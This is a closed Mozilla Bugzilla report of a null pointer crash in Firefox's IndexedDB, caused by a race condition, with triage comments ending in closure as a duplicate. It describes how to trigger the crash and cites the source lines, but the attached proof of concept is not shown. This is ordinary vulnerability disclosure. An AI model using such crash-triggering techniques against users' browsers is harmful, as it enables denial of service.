Closed Bug 1253942 Opened 8 years ago Closed 8 years ago

Null Pointer Exception in IndexedDB - mozilla::dom::indexedDB::(anonymous namespace)::DatabaseConnection::GetCachedStatement

Categories

(Core :: Storage: IndexedDB, defect)

Product:
Core
Component:
Storage: IndexedDB
Version:
44 Branch
Type:
defect
Priority:
Not set
Severity:
normal

Tracking

()

Status:
RESOLVED DUPLICATE of bug 1195149

People

(Reporter: nick, Unassigned)

Details

(Keywords: crash, csectype-nullptr, testcase)

Attachments

(1 file)

poc.html
3.66 KB, text/html
Details
Attached file poc.html 
User Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/48.0.2564.116 Safari/537.36

Steps to reproduce:

Please see the PoC to reproduce the issue.


Actual results:

The browser crashed citing a null pointer dereference.


Expected results:

A race condition in IndexedDB leads to a null pointer exception. By repeatedly opening, performing operations, and closing IndexedDB database connections, it is possible to trigger a null pointer exception that crashes the browser.  The PoC was tested on Mac OS X 10.11 with the release binary of FireFox 44.0.2 and can cause a crash within a few minutes of opening the poc.  Attempts to reproduce the issue on Ubuntu 15.10 and Windows 7 were unsuccessful.  

The offending line is:

dom/indexedDB/ActorsParent.cpp:6700

This becomes an issue when “mStorageConnection” is set to “nullptr” in dom/indexedDB/ActorsParent.cpp:10300.  

A crash report is available at: https://crash-stats.mozilla.com/report/index/e8160559-442f-413c-a294-444852160306

I'm not certain if this represents a significant security threat, but I will mark is as so just in case.
Does this still reproduce using Nightly (v47, https://nightly.mozilla.org/ ) ?
Group: firefox-core-security → core-security
Component: Untriaged → DOM: IndexedDB
Flags: needinfo?(nick)
Product: Firefox → Core
I just ran my PoC on nightly for about two hours without a crash.  I'll let it run until tomorrow AM, but it seems like this issue is fixed in nightly.
Flags: needinfo?(nick)
I couldn't reproduce on Mac Fx 44.0.2
Keywords: crash, csectype-nullptr, testcase
Group: core-security → dom-core-security
I never saw any additional crashes on the nightly version.

Is there any information I can provide that might assist in helping you reproduce this problem?
I retested with firefox 45 and can't reproduce the crash.  My guess is this is fixed now, and may have only been a problem on very specific setups.
I ran this overnight on trunk with no success.

It certainly happens in the wild, because this is bug 1195149 and bug 1172822.
Kyle, should we dupe this to either bug 1195149 or bug 1172822?
Flags: needinfo?(khuey)
Status: UNCONFIRMED → RESOLVED
Closed: 8 years ago
Flags: needinfo?(khuey)
Resolution: --- → DUPLICATE
You need to log in before you can comment on or make changes to this bug.

Attachment

General

Creator:
Created:
Updated:
Size: